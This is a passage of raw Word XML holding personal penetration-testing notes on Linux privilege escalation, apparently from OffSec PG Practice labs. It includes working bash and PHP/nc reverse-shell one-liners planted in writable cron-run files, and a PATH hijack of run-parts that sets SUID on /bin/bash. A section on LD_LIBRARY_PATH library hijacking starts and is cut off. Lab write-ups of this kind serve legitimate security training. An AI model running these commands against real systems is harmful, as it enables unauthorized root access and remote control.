          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we go manually look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/log-backup.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see we have edit permissions!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002479">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So we can put in a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000247A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1232"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'sh -i &gt;&amp; /dev/tcp/192.168.45.232/4444 0&gt;&amp;1' &gt; log-backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000247B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listening and wait for root shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000247C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1232"/>
        </w:numPr>
        <w:ind w:left="144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247D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000247E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example of this was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId770">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Lavita</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice where there was a file being run by a user (not root) and it was being run using PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000247F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1562100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="581" name="image565.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image565.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId771"/>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2480">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="377"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we had access to /var/www/html/artisan, so we could replace that file with a PHP rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002481">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="573"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv artisan artisan.origital</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="573"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename original file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002483">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="573"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '&lt;?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.45.174 1234 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;/tmp/f"); ?&gt;' &gt; artisan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002484">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="573"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in a rev shell into malicious file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002485">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002486">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dfgbyzxqp8y9" w:id="323"/>
      <w:bookmarkEnd w:id="323"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Putting malicious file in PATH with high priority (/usr/bin/local)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002487">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002488">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId772">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Roquefort</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2489">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2311400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="240" name="image236.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image236.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId773"/>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248A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000248B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that we can edit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is often seen in the PATH of cron jobs, so if there is a cron job with unspecified path, then we can make it run our malicious version of the file. '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000248C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000248D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="508000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="172" name="image181.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image181.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId774"/>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248E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/bin is almost top priority in PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000248F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002490">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="94" name="image102.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image102.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId775"/>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2491">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002492">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then check pspy which is running a binary called run-parts and it seems to be associated with /etc/cron.hourly. However, I don't think this means it's run every hour. I think the /etc/cron.hourly is an argument to this command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002493">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002494">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3949700" cy="711200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId776"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="39497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2495">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002496">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then check to see where the real run-parts is located and it's in /bin which is LOWER priority than /usr/local/bin in the path, meaning if we can add a file called run-parts to /usr/local/bin, then it will run ours, assuming it runs "run-parts" without full path which it looks like it is from the pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002497">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002498">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002499">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "chmod +s /bin/bash" &gt; /usr/local/bin/run-parts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x /usr/local/bin/run-parts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then check /bin/bash after a while and see if SUID bit is set! IF so, run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And you have root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u42c4y6uh5ha" w:id="324"/>
      <w:bookmarkEnd w:id="324"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding malicious missing .so file by putting in directory that is part of LD_LIBRARY_PATH path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_LIBRARY_PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="895"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an environment variable that tells Linux where to look for shared libraries (.so) first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId777">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. It is also explained in the official Offsec writeup. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="973"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First we saw a cron job that ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
